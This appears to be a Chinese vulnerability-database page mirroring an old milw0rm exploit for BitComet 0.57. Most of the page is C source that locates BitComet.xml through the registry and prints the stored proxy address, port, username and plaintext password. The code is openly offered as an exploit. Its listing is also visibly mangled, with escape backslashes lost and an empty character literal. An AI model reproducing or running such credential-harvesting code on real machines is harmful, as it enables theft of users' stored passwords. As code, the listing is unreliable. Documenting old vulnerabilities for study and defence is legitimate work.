BitComet 0.57 – Local Proxy Password Disclosure

BitComet 0.57 – Local Proxy Password Disclosure

漏洞ID 1055008 漏洞类型
发布时间 2005-04-13 更新时间 2005-04-13
图片[1]-BitComet 0.57 – Local Proxy Password Disclosure-安全小百科CVE编号 N/A
图片[2]-BitComet 0.57 – Local Proxy Password Disclosure-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/937
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*******************************************************************

BitComet 0.57 Local Proxy Password Disclosure Exploit by Kozan

Application: BitComet 0.57 (and probably prior versions)
Vendor:www.bitcomet.com
Vulnerable Description: BitComet 0.57 discloses proxy passwords
to local users.


Discovered & Coded by: Kozan
Credits to ATmaCA
Web: www.netmagister.com
Web2: www.spyinstructors.com
Mail: [email protected]

*******************************************************************/

#include <stdio.h>
#include <string.h>
#include <windows.h>


HKEY hKey;
#define BUFSIZE 100
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;


int adresal(char *FilePath,char *Str)
{
char kr;
int Sayac=0;
int Offset=-1;
FILE *di;
di=fopen(FilePath,"rb");

if( di == NULL )
{
fclose(di);
return -1;
}

while(!feof(di))
{
Sayac++;
for(int i=0;i<strlen(Str);i++)
{
kr=getc(di);
if(kr != Str[i])
{
if( i>0 )
{
fseek(di,Sayac+1,SEEK_SET);
}
break;
}
if( i > ( strlen(Str)-2 ) )
{
Offset = ftell(di)-strlen(Str);
fclose(di);
return Offset;
}
}
}
fclose(di);
return -1;
}


char *oku(char *FilePath,char *Str)
{

FILE *di;
char cr;
int i=0;
char Feature[500];

int Offset = adresal(FilePath,Str);

if( Offset == -1 )
return "";

if( (di=fopen(FilePath,"rb")) == NULL )
return "";

fseek(di,Offset+strlen(Str),SEEK_SET);

while(!feof(di))
{
cr=getc(di);
if(cr == '<')
break;
Feature[i] = cr;
i++;
}

Feature[i] = '';
fclose(di);
return Feature;
}




int main()
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\Microsoft\Windows\CurrentVersion",
0,
KEY_QUERY_VALUE,
&hKey) == ERROR_SUCCESS)
{

lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
(LPBYTE) prgfiles, &dwBufLen);

if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
{
RegCloseKey(hKey);
printf("An error occured!n");
exit(1);
}

RegCloseKey(hKey);

}
else
{
RegCloseKey(hKey);
printf("An error occured!n");
exit(1);
}

strcat(prgfiles,"\BitComet\BitComet.xml");


printf("BitComet 0.57 Local Proxy Password Disclosure Exploit by Kozann");
printf("Credits to ATmaCAn");
printf("www.netmagister.com - www.spyinstructors.com n");
printf("[email protected] nn");

char Address[BUFSIZE], Port[BUFSIZE], Username[BUFSIZE], Password[BUFSIZE];

strcpy(Address,oku(prgfiles,"<ProxyServer>"));
strcpy(Port,oku(prgfiles,"<ProxyPort>"));
strcpy(Username,oku(prgfiles,"<ProxyUsername>"));
strcpy(Password,oku(prgfiles,"<ProxyPassword>"));

printf("Proxy Address : %sn",Address);
printf("Proxy Port : %sn",Port);
printf("Proxy Username : %sn",Username);
printf("Proxy Password : %sn",Password);

return 0;
} 

// milw0rm.com [2005-04-13]

相关推荐: Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability

Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability 漏洞ID 1102965 漏洞类型 Input Validation Error 发布时间 2001-08-29 更新时间 20…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享